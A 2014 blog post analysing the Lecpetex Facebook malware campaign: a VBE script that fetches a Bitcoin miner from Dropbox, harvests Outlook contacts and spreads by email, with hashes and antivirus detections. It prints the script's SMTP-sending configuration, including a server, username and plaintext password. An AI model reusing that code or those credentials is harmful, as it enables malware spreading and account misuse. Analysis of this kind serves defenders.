[en] Virus Facebook hahaha (Lecpetex)

Dernière Mise à jour le

Some thread about a « Virus Facebok hahaha » thoses last days.
Seems some people go a private message with a zip file.

 

VirusFacebookhahaha

I dont have the Main zip sent by Facebook, but someone sent me an other zip related to this Virus.
it’s an interresting VBE script :

The VBE download some zip from dropbox and create a Temp directory to store the files.
it registed a DLL that is Bitcoin Miner : https://www.virustotal.com/fr/file/a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b/analysis/

SHA256:a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b
Nom du fichier :xml.exfffe
Ratio de détection :10 / 53
Date d’analyse :2014-06-10 22:16:20 UTC (il y a 29 minutes)

Ad-Aware Gen:Variant.Graftor.143340 20140610
AntiVir TR/Dropper.Gen 20140610
Avast Win32:Miner-B [PUP] 20140610
BitDefender Gen:Variant.Graftor.143340 20140610
ESET-NOD32 a variant of Win32/Injector.BEIE 20140610
Emsisoft Gen:Variant.Graftor.143340 (B) 20140610
F-Secure Gen:Variant.Graftor.143340 20140610
GData Gen:Variant.Graftor.143340 20140610
MicroWorld-eScan Gen:Variant.Graftor.143340 20140610
Symantec Suspicious.AD 20140610

Also the VBE is able using external utilities like ClickYes (maybe modified : https://www.virustotal.com/fr/file/618232771f97ded754fe06e0be4f47b8c1b13ca9030ef01774176791f354447b/analysis/ ) to get the Outlook contact list and spread by email.
To do that, it use a greek SMP Server :

.Item(« http://schemas.microsoft.com/cdo/configuration/sendusing ») = 2
.Item(« http://schemas.microsoft.com/cdo/configuration/smtpserver ») = « mailgate.otenet.gr »
.Item(« http://schemas.microsoft.com/cdo/configuration/smtpserverport ») = 587
.Item(« http://schemas.microsoft.com/cdo/configuration/smtpusessl ») = False
.Item(« http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout ») = 60
.Item(« http://schemas.microsoft.com/cdo/configuration/smtpauthenticate ») = 1
.Item(« http://schemas.microsoft.com/cdo/configuration/sendusername ») = « [email protected] »
.Item(« http://schemas.microsoft.com/cdo/configuration/sendpassword ») = « nat1978# »

Interresting !

I will try to get the zip file sent on Facebook, if different, will edit this thread if so.

EDIT – June 12

Facebook Malicious Spam example :

Virus #1Virus #2

Also, Someone sent me this article (in French) : http://forum.security-x.fr/securite-generale/vague-de-spams-malicieux-sur-facebook/
There is a sample, but a bit old : First submission 2014-05-28 15:43:35 UTC (il y a 2 semaines) => https://www.virustotal.com/fr/file/4bcb865060ec401b2ed1d20422ed00488e04884f9abd573ca9d41d666b1fe7fc/analysis/1402529232/
The Jar is trying to download zip at dropbox (maybe the same vbe script was there) but Dropbox has already removed all.

Seems also that Malwarebytes has already blog about it : http://blog.malwarebytes.org/security-threat/2014/03/malicious-messages-foray-facebook/

VirusFacebook_hahah

EDIT – June 23

Another article about this threat : http://thegoldenmessenger.blogspot.de/2014/06/malware-spread-over-facebook.html
According to the article, Microsoft detect the Jar with the name Java/Carastavona.E

EDIT – July 9 – Facebook takes down Lecpetex Botnet

Facebook takes down Lecpetex Botnet – more informations : https://www.facebook.com/notes/protect-the-graph/taking-down-the-lecpetex-botnet/1477464749160338

Trouver la solution sur le forum d'aide

Vous êtes arrivé au terme de l'article [en] Virus Facebook hahaha (Lecpetex) mais vous n'avez pas trouvé la solution à votre problème...
Suivez ces articles du forum pour trouver une réponse ou demandez à votre tour de l'aide sur le forum


Vous avez trouvé cet article utile et interressant, n'hésitez pas à le partager...
Une question informatique ?
Un virus à supprimer ? Votre PC est lent ?
Demander de l'aide sur le forum

Laisser un commentaire

0 Partages
Tweetez
Partagez
Enregistrer
Partagez